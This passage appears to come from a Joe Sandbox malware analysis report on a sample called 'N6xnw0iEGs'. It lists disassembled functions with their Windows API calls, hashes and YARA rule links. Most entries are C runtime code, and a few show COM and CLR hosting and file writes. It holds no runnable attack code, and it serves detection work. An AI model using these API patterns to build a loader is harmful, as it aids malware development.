Opcode ID: 78c3809f02e4b57ed593cd3b1a4fced05d1416ce31e4a145e54d53faa019e399
Instruction ID: 52cb6008658b8b72823cb886a9341bdea0614ef5ae18aa91fa9f6466c8684ce8
Opcode Fuzzy Hash: 78c3809f02e4b57ed593cd3b1a4fced05d1416ce31e4a145e54d53faa019e399
Instruction Fuzzy Hash: 70319371A0022CAFEF259F648C84BE9B7B9FF59314F0044D5E688A6190D6B1AEC59F60

Function 10002E12 Relevance: 15.2, APIs: 10, Instructions: 151comCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 10002E24
CoInitialize.OLE32(00000000), ref: 10002E2B
CoCreateInstance.COMBASE(1001BAA4,00000000,00000001,1001BA94,?), ref: 10002E4D
SafeArrayAccessData.OLEAUT32(?,?), ref: 10002F0B
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 10002F1E
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10002F2D

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: ArraySafe$Bound$AccessCreateDataInitInitializeInstanceVariant
String ID:
API String ID: 1776067534-0
Opcode ID: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
Instruction ID: 22d648866f7fc07f360164d737246109097e3e6bd3236689373f1f3363e173f2
Opcode Fuzzy Hash: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
Instruction Fuzzy Hash: CB513D35A0061AAFEB01DFA4CC88AAEBBB9FF05784F104469FE05EB214D771D9058B50

Function 1000A270 Relevance: 13.6, APIs: 9, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(10002554,1001F0B0,?,00000000,00000000,?,100016A6,?,00000004,10002554,?), ref: 1000A2B7
MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,100016A6,?,00000004,10002554,?), ref: 1000A2CD
GetLastError.KERNEL32(?,100016A6,?,00000004,10002554,?), ref: 1000A2DC
MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,?,100016A6,?,00000004,10002554), ref: 1000A36B
_free.LIBCMT ref: 1000A37E
GetLastError.KERNEL32(?,?,100016A6,?,00000004,10002554), ref: 1000A386
SysAllocString.OLEAUT32(00000000), ref: 1000A3A1
_free.LIBCMT ref: 1000A3B2

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide_free$AllocStringlstrlen
String ID:
API String ID: 2233872252-0
Opcode ID: f327275d7ee9ba27244d37565c5e2fe9b4169d76855805d4d3bda9eb47e150af
Instruction ID: 92e8be5aa1b14d7476cacc8489220ecb3b4d7d492cf033020fc8328679f134fd
Opcode Fuzzy Hash: f327275d7ee9ba27244d37565c5e2fe9b4169d76855805d4d3bda9eb47e150af
Instruction Fuzzy Hash: 7841C172D00755ABF710DF688C45B9F7BB8FB0A7E0F114239F905A7285D734AA8086A1

Function 04298934 Relevance: 10.6, APIs: 7, Instructions: 114COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,0000000D,?), ref: 04298999
CreateDirectoryA.KERNEL32(?,00000000,?,0000000D,?), ref: 042989AD
__fassign.LIBCMT ref: 04298960

Part of subcall function 0429B61F: __mbsnbcpy_l.LIBCMT ref: 0429B62F

__fassign.LIBCMT ref: 04298A18
__fassign.LIBCMT ref: 04298A47
GetFileAttributesA.KERNEL32(00000000,?,0000000D,?), ref: 04298A5A
CreateDirectoryA.KERNEL32(00000000,00000000,?,0000000D,?), ref: 04298A6E

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l
String ID:
API String ID: 2854908881-0
Opcode ID: 16ce0dfbe031d256b1b38220d2be9da1467ea29f141c0d8b293b51d1b3768674
Instruction ID: 5fde35bda03b92c87c127dce0cd8ad19b9bf92eff2236ff6811161e0062184a1
Opcode Fuzzy Hash: 16ce0dfbe031d256b1b38220d2be9da1467ea29f141c0d8b293b51d1b3768674
Instruction Fuzzy Hash: C9411D71A202499AEF10EF68DC88BE977EC9F06304F5801E9D998D3281D770AE48CB55

Function 0429E384 Relevance: 10.6, APIs: 7, Instructions: 109memorythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(100179E4,?,0429BA97,1001C1E0,00000008,0429BC2B,?,?,?,1001C200,0000000C,0429BCE6,?), ref: 0429E38C
__mtterm.LIBCMT ref: 0429E398

Part of subcall function 0429E063: RtlDecodePointer.NTDLL(1001F9BC), ref: 0429E074
Part of subcall function 0429E063: TlsFree.KERNEL32(1001F9C0,0429BB5A,0429BB40,1001C1E0,00000008,0429BC2B,?,?,?,1001C200,0000000C,0429BCE6,?), ref: 0429E08E

TlsAlloc.KERNEL32(?,?,0429BA97,1001C1E0,00000008,0429BC2B,?,?,?,1001C200,0000000C,0429BCE6,?), ref: 0429E425
__init_pointers.LIBCMT ref: 0429E44A
__calloc_crt.LIBCMT ref: 0429E4B8
GetCurrentThreadId.KERNEL32 ref: 0429E4E4

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm
String ID:
API String ID: 3766280069-0
Opcode ID: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
Instruction ID: a8d6e77377757a222e945e6c882b826fa81c68db09c8faf445806ece91b7f719
Opcode Fuzzy Hash: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
Instruction Fuzzy Hash: F1313D31A10731AEEB11EF758C886173EE6FB45760B21462AF845D72A1EB34E842CF91

Function 1000E380 Relevance: 10.6, APIs: 7, Instructions: 109memorythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(100179E4,?,1000BA93,1001C1E0,00000008,1000BC27,?,?,?,1001C200,0000000C,1000BCE2,?), ref: 1000E388
__mtterm.LIBCMT ref: 1000E394

Part of subcall function 1000E05F: RtlDecodePointer.NTDLL(1001F9BC), ref: 1000E070
Part of subcall function 1000E05F: TlsFree.KERNEL32(1001F9C0,1000BB56,1000BB3C,1001C1E0,00000008,1000BC27,?,?,?,1001C200,0000000C,1000BCE2,?), ref: 1000E08A
Part of subcall function 1000E05F: _free.LIBCMT ref: 1000EE82

TlsAlloc.KERNEL32(?,?,1000BA93,1001C1E0,00000008,1000BC27,?,?,?,1001C200,0000000C,1000BCE2,?), ref: 1000E421
__init_pointers.LIBCMT ref: 1000E446
__calloc_crt.LIBCMT ref: 1000E4B4
GetCurrentThreadId.KERNEL32 ref: 1000E4E0

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
String ID:
API String ID: 347030822-0
Opcode ID: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
Instruction ID: dfa6302f412d44b18f04af5178cbb3b887102783623a010561f8bc2fa93634a2
Opcode Fuzzy Hash: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
Instruction Fuzzy Hash: BC315E31901BB1AFF751DF748C8861B3EA2FB443A0B20462AF844E7276DB749842CF50

Function 04299828 Relevance: 9.3, APIs: 6, Instructions: 301COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 04299832
wsprintfA.USER32 ref: 042998C1
wsprintfA.USER32 ref: 04299BE4

Part of subcall function 04298356: __fassign.LIBCMT ref: 04298369

_wprintf.LIBCMT ref: 04299960
std::_Xinvalid_argument.LIBCPMT ref: 04299BC0
OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10016B40,000000FF), ref: 04299BFA

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: wsprintf$DebugH_prolog3_OutputStringXinvalid_argument__fassign_wprintfstd::_
String ID:
API String ID: 2279894289-0
Opcode ID: 7dd8b7e9ad2e1e9d9e634c7a49fa1b03d56ec5a7a63cc935a26c00e635a16abe
Instruction ID: 6a9b0abcdff742a6644a992e1edccf5dec697e5a3e790a5240e27d69bd1f5314
Opcode Fuzzy Hash: 7dd8b7e9ad2e1e9d9e634c7a49fa1b03d56ec5a7a63cc935a26c00e635a16abe
Instruction Fuzzy Hash: A3C128B1E212699BDF22DFA4C890BDDB7F8AF09314F5444ADE809A7241DB316E85CF50

Function 04291034 Relevance: 9.1, APIs: 6, Instructions: 85comstringCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 04291054
CoCreateInstance.COMBASE(10017278,00000000,00000001,10017268,?), ref: 04291076
lstrlen.KERNEL32 ref: 042910AF
_memset.LIBCMT ref: 042910E4
MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 04291103
CoUninitialize.COMBASE ref: 04291135

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide_memsetlstrlen
String ID:
API String ID: 2586284713-0
Opcode ID: 0439dd65e13f52771752c10942c6dff05d4d537cd571eff573b15698fac21795
Instruction ID: 0f5aeefb13868b67bbed33620022dbf233049824a9af0598049f2b962dc92b55
Opcode Fuzzy Hash: 0439dd65e13f52771752c10942c6dff05d4d537cd571eff573b15698fac21795
Instruction Fuzzy Hash: 6331E7B4A40228AFDB20DBA5CC8CAEA77B8FF59700F104598F519D7251DA70AE81CF61

Function 10001030 Relevance: 9.1, APIs: 6, Instructions: 85comstringCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 10001050
CoCreateInstance.COMBASE(10017278,00000000,00000001,10017268,?), ref: 10001072
lstrlen.KERNEL32 ref: 100010AB
_memset.LIBCMT ref: 100010E0
MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 100010FF
CoUninitialize.COMBASE ref: 10001131

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide_memsetlstrlen
String ID:
API String ID: 2586284713-0
Opcode ID: 0439dd65e13f52771752c10942c6dff05d4d537cd571eff573b15698fac21795
Instruction ID: ac1339e8a26476a343ece4beee8e0933947ee5251eb98b3c0bf2324ef1832f68
Opcode Fuzzy Hash: 0439dd65e13f52771752c10942c6dff05d4d537cd571eff573b15698fac21795
Instruction Fuzzy Hash: E631F6B4A80228AFDB10DBA4CC8CEEA77B9FF59700F104598F519DB251DA719A81CF61

Function 1000D81F Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 1000D82B

Part of subcall function 1000E1C9: __getptd_noexit.LIBCMT ref: 1000E1CC
Part of subcall function 1000E1C9: __amsg_exit.LIBCMT ref: 1000E1D9

__amsg_exit.LIBCMT ref: 1000D84B
__lock.LIBCMT ref: 1000D85B
InterlockedDecrement.KERNEL32(?), ref: 1000D878
_free.LIBCMT ref: 1000D88B
InterlockedIncrement.KERNEL32(1001F670), ref: 1000D8A3

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 8dc76273e3b943d23cf5b7c912b774a5a5bc82802a68655e1fc91e2cb08c822f
Instruction ID: 739c6336b113b250371589eb23bd778b8bf39228b591d0d5a0a8eef1b7f89c6c
Opcode Fuzzy Hash: 8dc76273e3b943d23cf5b7c912b774a5a5bc82802a68655e1fc91e2cb08c822f
Instruction Fuzzy Hash: F3016135904B22EBFB01FB649889B6D77A0FB007D0F15811AE444A7199CB34ED81CBA1

Function 04292F99 Relevance: 7.8, APIs: 5, Instructions: 270memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 04292FA0
CLRCreateInstance.MSCOREE(10019868,10019858,?), ref: 04292FBA
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 042930BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 042930ED
SysAllocString.OLEAUT32(?), ref: 0429319F

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: ArrayDataSafe$AccessAllocCreateH_prolog3InstanceStringUnaccess
String ID:
API String ID: 3666180938-0
Opcode ID: d16ef4301ba3be405cc17b9ae037d6b8f6e3abc978365242e36abdc72a83fd9f
Instruction ID: 249e064f8523d8c175d37c5769addd27165adb933c8b0dc4ac768297810c7733
Opcode Fuzzy Hash: d16ef4301ba3be405cc17b9ae037d6b8f6e3abc978365242e36abdc72a83fd9f
Instruction Fuzzy Hash: 16A12771A1024AAFDF00DFE8CC889AEBBB9FF49304F644569E605EB251DB35AD45CB10

Function 10002F95 Relevance: 7.8, APIs: 5, Instructions: 270memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10002F9C
CLRCreateInstance.MSCOREE(10019868,10019858,?), ref: 10002FB6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 100030BA
SafeArrayUnaccessData.OLEAUT32(?), ref: 100030E9
SysAllocString.OLEAUT32(?), ref: 1000319B

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: ArrayDataSafe$AccessAllocCreateH_prolog3InstanceStringUnaccess
String ID:
API String ID: 3666180938-0
Opcode ID: 44eb9ee277fd45cbe9789f601392d5aef2c6ce648ac6e213b405d3a886132e71
Instruction ID: 057d9618c9b2eace4bdb604887b9081d3f24a166150124c3c6b43a88f9cf3334
Opcode Fuzzy Hash: 44eb9ee277fd45cbe9789f601392d5aef2c6ce648ac6e213b405d3a886132e71
Instruction Fuzzy Hash: F1A13871A00249EFEB01CFE4CC989AEBBB9FF49344F608469E605EB251C7359E46CB10

Function 04292AE2 Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0429A263: _malloc.LIBCMT ref: 0429B4E6

_memset.LIBCMT ref: 04292B19
CreateFileA.KERNEL32(?,C0000000,00000001,?,00000004,00000001), ref: 04292BC3
WriteFile.KERNEL32(00000000,?,?,?,?,?,00000004,00000001), ref: 04292BEA
FlushFileBuffers.KERNEL32(00000005,?,?,00000004,00000001), ref: 04292BF6
CloseHandle.KERNEL32(00000005,?,?,00000004,00000001), ref: 04292C02

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: File$BuffersCloseCreateFlushHandleWrite_malloc_memset
String ID:
API String ID: 3870520013-0
Opcode ID: 61de53dc5b196caa3027edfa587beff663779e0c607d09a773be95f4cd1b64fe
Instruction ID: ecd642e7c02e7528001ab05e8a0e497279588bb36d31dd96faa549412eafcfca
Opcode Fuzzy Hash: 61de53dc5b196caa3027edfa587beff663779e0c607d09a773be95f4cd1b64fe
Instruction Fuzzy Hash: 7531A472A10128FEDF266F60CC899ED7AF9FB09355F00C4E9E50961160DB325F929FA0

Function 100137A6 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 100137B4

Part of subcall function 1000AC8B: __FF_MSGBANNER.LIBCMT ref: 1000ACA4
Part of subcall function 1000AC8B: __NMSG_WRITE.LIBCMT ref: 1000ACAB
Part of subcall function 1000AC8B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000ACD0

_free.LIBCMT ref: 100137C7

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 962c0645284c0189794ec4e439591f60a48f420d20f40ccfe0a197a9b264536f
Instruction ID: 73445425a774ab1d1a036c9d07cd9d8bb7fb446bc64d92f65309e6ad6f59e006
Opcode Fuzzy Hash: 962c0645284c0189794ec4e439591f60a48f420d20f40ccfe0a197a9b264536f
Instruction Fuzzy Hash: 6F1198769047159BEB22EF749C4474E3B95EF452E5B21C526FC089E191DF34D8C186D0

Function 1000A33D Relevance: 7.6, APIs: 5, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,?,100016A6,?,00000004,10002554), ref: 1000A36B
_free.LIBCMT ref: 1000A37E
GetLastError.KERNEL32(?,?,100016A6,?,00000004,10002554), ref: 1000A386
SysAllocString.OLEAUT32(00000000), ref: 1000A3A1
_free.LIBCMT ref: 1000A3B2

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: _free$AllocByteCharErrorLastMultiStringWide
String ID:
API String ID: 3133011222-0
Opcode ID: c488acb78da72a3a34422de2c23df641aa98084b8b09471c2be350180f227cc0
Instruction ID: 2077ca9f4d592fb9d393f88bccc68470f0d953868ed846a2b40838c90a075a67
Opcode Fuzzy Hash: c488acb78da72a3a34422de2c23df641aa98084b8b09471c2be350180f227cc0
Instruction Fuzzy Hash: 1311C676E00205ABF714DB648C86B9EB764FF4A2E1F114339FD0AB3245EA35F9C08651

Function 042A05E2 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 042A060A

Part of subcall function 0429C1DF: __getptd.LIBCMT ref: 0429C1ED
Part of subcall function 0429C1DF: __getptd.LIBCMT ref: 0429C1FB

__getptd.LIBCMT ref: 042A0614

Part of subcall function 0429E1CD: __getptd_noexit.LIBCMT ref: 0429E1D0
Part of subcall function 0429E1CD: __amsg_exit.LIBCMT ref: 0429E1DD

__getptd.LIBCMT ref: 042A0622
__getptd.LIBCMT ref: 042A0630
__getptd.LIBCMT ref: 042A063B

Part of subcall function 0429C284: __CallSettingFrame@12.LIBCMT ref: 0429C2D0

Part of subcall function 042A0708: __getptd.LIBCMT ref: 042A0717
Part of subcall function 042A0708: __getptd.LIBCMT ref: 042A0725

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 3282538202-0
Opcode ID: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
Instruction ID: 6133270c6f33a0206113f1f9fe9c3210bd75c7dc6d39a65a25a8662f7b38c987
Opcode Fuzzy Hash: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
Instruction Fuzzy Hash: 2A11C6B1E102099FEF00EFA4C844BAD7BF1FF04318F118469E854AB290DB38AE159F50

Function 100105DE Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 10010606

Part of subcall function 1000C1DB: __getptd.LIBCMT ref: 1000C1E9
Part of subcall function 1000C1DB: __getptd.LIBCMT ref: 1000C1F7

__getptd.LIBCMT ref: 10010610

Part of subcall function 1000E1C9: __getptd_noexit.LIBCMT ref: 1000E1CC
Part of subcall function 1000E1C9: __amsg_exit.LIBCMT ref: 1000E1D9

__getptd.LIBCMT ref: 1001061E
__getptd.LIBCMT ref: 1001062C
__getptd.LIBCMT ref: 10010637

Part of subcall function 1000C280: __CallSettingFrame@12.LIBCMT ref: 1000C2CC

Part of subcall function 10010704: __getptd.LIBCMT ref: 10010713
Part of subcall function 10010704: __getptd.LIBCMT ref: 10010721

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 3282538202-0
Opcode ID: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
Instruction ID: a34a26c94cea6deafa8c9f36bd2a728e31c5b09b861303a45c5e6187363f670b
Opcode Fuzzy Hash: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
Instruction Fuzzy Hash: 661119B5D00249DFEF00DFA4D845AED7BB0FF08314F10846AF814AB256DB38AA559F50

Function 0429E0A0 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(100179E4,1001C2A0,00000008,0429E1A8,00000000,00000000,?,?,?,?,042913CC,?,?,?), ref: 0429E0B1
__lock.LIBCMT ref: 0429E0E5

Part of subcall function 0429EF96: __amsg_exit.LIBCMT ref: 0429EFB8
Part of subcall function 0429EF96: RtlEnterCriticalSection.NTDLL(?), ref: 0429EFC0

InterlockedIncrement.KERNEL32(1001F248), ref: 0429E0F2
__lock.LIBCMT ref: 0429E106
___addlocaleref.LIBCMT ref: 0429E124

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit
String ID:
API String ID: 3732598078-0
Opcode ID: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
Instruction ID: 5734aa9ab69a31a5b1a3be2097fa391f92f18279766909e4683cd12e43a5db54
Opcode Fuzzy Hash: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
Instruction Fuzzy Hash: D0010571614B41ABEB20EF69C844759BBE0BF10325F11890EE49A5B7E0CBB4EA84CB11

Function 1000E09C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(100179E4,1001C2A0,00000008,1000E1A4,00000000,00000000,?,?,?,?,100013C8,?,?,?), ref: 1000E0AD
__lock.LIBCMT ref: 1000E0E1

Part of subcall function 1000EF92: __mtinitlocknum.LIBCMT ref: 1000EFA8
Part of subcall function 1000EF92: __amsg_exit.LIBCMT ref: 1000EFB4
Part of subcall function 1000EF92: RtlEnterCriticalSection.NTDLL(?), ref: 1000EFBC

InterlockedIncrement.KERNEL32(1001F248), ref: 1000E0EE
__lock.LIBCMT ref: 1000E102
___addlocaleref.LIBCMT ref: 1000E120

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 637971194-0
Opcode ID: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
Instruction ID: 9a48f909f7989934b9c459eb75a3addc35068ef0a3d0d7f40ba30f9e57b30fd9
Opcode Fuzzy Hash: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
Instruction Fuzzy Hash: BB015B75400B41AFF320DF69D846759BBE0FF10351F10890EE49AAB2A1CBB4FA80CB11

Function 0429DFA4 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0429DFB0

Part of subcall function 0429E1CD: __getptd_noexit.LIBCMT ref: 0429E1D0
Part of subcall function 0429E1CD: __amsg_exit.LIBCMT ref: 0429E1DD

__getptd.LIBCMT ref: 0429DFC7
__amsg_exit.LIBCMT ref: 0429DFD5
__lock.LIBCMT ref: 0429DFE5
__updatetlocinfoEx_nolock.LIBCMT ref: 0429DFF9

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 42c2f6527bd4046be4e14d4fef5b049670ef4ff3068ca2e77a2d90ff3d443448
Instruction ID: 48e8608dc55bd058711f470af8682a94fb2e8538540507a9e37a0439c36d9ac1
Opcode Fuzzy Hash: 42c2f6527bd4046be4e14d4fef5b049670ef4ff3068ca2e77a2d90ff3d443448
Instruction Fuzzy Hash: B2F09032B38611AAFF20FFB49806B5937E1AF00329F124109D054AB2D0CBB4BC40BA56

Function 1000DFA0 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 1000DFAC

Part of subcall function 1000E1C9: __getptd_noexit.LIBCMT ref: 1000E1CC
Part of subcall function 1000E1C9: __amsg_exit.LIBCMT ref: 1000E1D9

__getptd.LIBCMT ref: 1000DFC3
__amsg_exit.LIBCMT ref: 1000DFD1
__lock.LIBCMT ref: 1000DFE1
__updatetlocinfoEx_nolock.LIBCMT ref: 1000DFF5

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 42c2f6527bd4046be4e14d4fef5b049670ef4ff3068ca2e77a2d90ff3d443448
Instruction ID: f20503e91f1c088b6fa6549a6e33c434a8d9a84f450c806c27e01d97e1020dc2
Opcode Fuzzy Hash: 42c2f6527bd4046be4e14d4fef5b049670ef4ff3068ca2e77a2d90ff3d443448
Instruction Fuzzy Hash: E3F090369486919BF751FBA46807B6D37E1EF003E0F11811AF406BA1DACB34AD409A66

Function 042A098F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 042A09A2

Part of subcall function 042A08FD: ___BuildCatchObjectHelper.LIBCMT ref: 042A0933

_UnwindNestedFrames.LIBCMT ref: 042A09B9

Strings

csm, xrefs: 042A0991
csm, xrefs: 042A099E, 042A09B3, 042A09C6, 042A09E4, 042A09F4

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: BuildCatchObject$FramesHelperNestedUnwind
String ID: csm$csm
API String ID: 3487967840-3733052814
Opcode ID: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
